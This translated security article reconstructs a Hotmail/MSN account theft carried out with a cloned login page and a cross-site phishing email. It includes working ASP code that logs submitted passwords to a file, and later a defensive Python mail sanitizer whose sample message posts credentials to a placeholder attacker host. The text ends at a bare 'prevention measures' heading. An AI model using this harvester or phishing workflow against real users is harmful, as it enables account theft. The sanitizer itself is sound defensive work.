Last time we introduced what a cross-site attack (Cross Site Scripting, XSS) is. Today we look at a specific example and describe how to avoid falling victim to cross-site attacks.
"Cross-site intrusion" case reconstruction: stealing an MSN account through a cross-site attack
Based on the clues the user gave us about how his MSN account was lost, we reconstruct the case and reason out how the hacker stole his MSN account.
Step one: the hacker first makes a forged web page that looks identical to the Hotmail login interface. He signs in to the official Hotmail website, clicks "File" in the menu bar and chooses "Save As" from the drop-down menu to save the page to disk. He then opens the saved page in Dreamweaver or another web editing program (Figure 1), finds the position where the user name and password are entered, and adds this user-name-and-password-stealing code:
<%
bbsuser = request("bbsuser")
bbspwd = request("bbspwd")
set fs = server.CreateObject("Scripting.FileSystemObject")            ' open the file system service
set file = fs.OpenTextFile(server.MapPath("Hotmail.txt"), 8, True)    ' open "Hotmail.txt" for appending, creating it if it does not exist
file.writeline bbsuser + "----" + bbspwd                                ' write the received user name and password to "Hotmail.txt"
file.close
set file = nothing
set fs = nothing
%>
Then the local link addresses and related parameters in the original Hotmail page are modified so that the images display properly; finally the page is saved as "index.asp" and uploaded to the hacker's own website.
Step two: with the disguised page done, the hacker next creates the cross-site Hotmail email. Hackers generally choose mail software that lets them edit the HTML code of a message directly, such as DreamMail. Start DreamMail and create a new account for an email address that supports POP3.
Then click "View" in the DreamMail menu bar and choose the "Switch to the Deluxe version" option. Create a new blank HTML email in DreamMail, right-click in the message body, select "Edit HTML source", and in the pop-up HTML source editor window enter the following XSS cross-site code:
In this code, the hacker changes the link address "http://www.hacker.cn/test/index.asp?uid=miaodeyu@Hotmail.com" to match his own disguised page address and the target's email address. After the message is edited, click "OK" and the cross-site email is complete.
Step three: the hacker gives this email a loud, enticing subject and sends it to the victim's MSN mailbox. When the victim views the email in Hotmail, a Hotmail login box pops up to trick him into entering his account name and password to log in. If the victim's guard is down and he enters his account name and password into the malicious page, this information is not sent to Microsoft's server but quietly sent to the hacker.
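As a defensive counterpart to the three steps above, here is an added example (my own code, not from the original article or from Hotmail) of the kind of filtering a mail gateway or webmail front end applies to an HTML message body before rendering it. It strips script, frame and form elements (the pieces a cross-site login box needs), removes inline event handlers and javascript:/vbscript:/data: URLs, and reports everything it removed so the message can be flagged or quarantined. The sample message body is constructed for this example; attacker.example and mail.example are placeholder hosts, and the bbsuser/bbspwd field names are borrowed from the article's code only to show the filter catching that pattern.

```python
import html
from html.parser import HTMLParser

# Elements that have no business in a rendered mail body: active content,
# embedded frames (used to pull in a look-alike login page) and form
# controls (used to capture what the reader types).
BLOCKED_TAGS = {"script", "iframe", "frame", "frameset", "object", "embed",
                "applet", "form", "input", "button", "textarea", "select",
                "meta", "link", "base", "style"}
# Elements HTML defines as having no closing tag.
VOID_TAGS = {"br", "hr", "img", "input", "meta", "link", "base", "area", "col"}
# Attributes that carry a URL and so can smuggle a script payload.
URL_ATTRS = {"href", "src", "action", "formaction", "background", "poster"}
DANGEROUS_SCHEMES = ("javascript:", "vbscript:", "data:")


class MailSanitizer(HTMLParser):
    """Rebuilds an HTML body with active and form content removed.

    `removed` records every element or attribute that was dropped, so a
    gateway can tag or quarantine messages that needed cleaning at all.
    """

    def __init__(self):
        super().__init__(convert_charrefs=False)
        self.out = []
        self.removed = []
        self._skip = 0  # nesting depth inside a blocked element

    def handle_starttag(self, tag, attrs):
        if self._skip:                      # inside a blocked element: drop everything
            if tag not in VOID_TAGS:
                self._skip += 1
            return
        if tag in BLOCKED_TAGS:
            self.removed.append(f"<{tag}>")
            if tag not in VOID_TAGS:
                self._skip = 1
            return
        kept = []
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on"):      # onclick, onerror, onload, ...
                self.removed.append(f"<{tag} {lname}>")
                continue
            if lname in URL_ATTRS and value is not None:
                v = value.replace("\x00", "").strip().lower()
                if v.startswith(DANGEROUS_SCHEMES):
                    self.removed.append(f"<{tag} {lname}={v.split(':')[0]}:>")
                    continue
            kept.append((name, value))
        # HTMLParser hands us attribute values already unescaped, so re-escape them.
        attr_text = "".join(
            f' {n}="{html.escape(v, quote=True)}"' if v is not None else f" {n}"
            for n, v in kept
        )
        self.out.append(f"<{tag}{attr_text}>")

    def handle_startendtag(self, tag, attrs):
        # Treat <x/> as <x></x>, so a self-closed blocked element cannot leave us skipping forever.
        self.handle_starttag(tag, attrs)
        if tag not in VOID_TAGS:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if self._skip:
            if tag not in VOID_TAGS:
                self._skip -= 1
            return
        if tag in BLOCKED_TAGS:
            return                          # stray closing tag for something never opened
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(data)

    def handle_entityref(self, name):
        if not self._skip:
            self.out.append(f"&{name};")

    def handle_charref(self, name):
        if not self._skip:
            self.out.append(f"&#{name};")

    def handle_comment(self, data):
        pass                                # comments (incl. conditional comments) carry nothing a reader needs


def sanitize_mail_html(body: str):
    """Return (clean_html, removed_items) for an HTML mail body."""
    p = MailSanitizer()
    p.feed(body)
    p.close()
    return "".join(p.out), p.removed


# Constructed sample: a message that tries to show a fake login box and
# post the typed fields to an outside host (placeholder names, not real).
SAMPLE_MAIL = (
    '<html><body>'
    '<p>Your mailbox is almost full. &copy; 2005</p>'
    '<script>window.location="http://attacker.example/index.asp"</script>'
    '<iframe src="http://attacker.example/index.asp?uid=user@example.com"></iframe>'
    '<form action="http://attacker.example/index.asp"><input name="bbsuser">'
    '<input name="bbspwd" type="password"><input type="submit"></form>'
    '<a href="javascript:alert(1)">Sign in</a> '
    '<img src="http://mail.example/logo.gif" onerror="alert(1)">'
    '</body></html>'
)

if __name__ == "__main__":
    clean, removed = sanitize_mail_html(SAMPLE_MAIL)
    print("clean body :", clean)
    print("removed    :", removed)
    print("verdict    :", "FLAG for review" if removed else "clean")
```

The `removed` list is the detection signal: a legitimate notification mail produces an empty list, while a message that needed a form, frame or script stripped is exactly the kind that should be held or delivered with a warning banner rather than rendered as-is.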
Cross-site prevention measures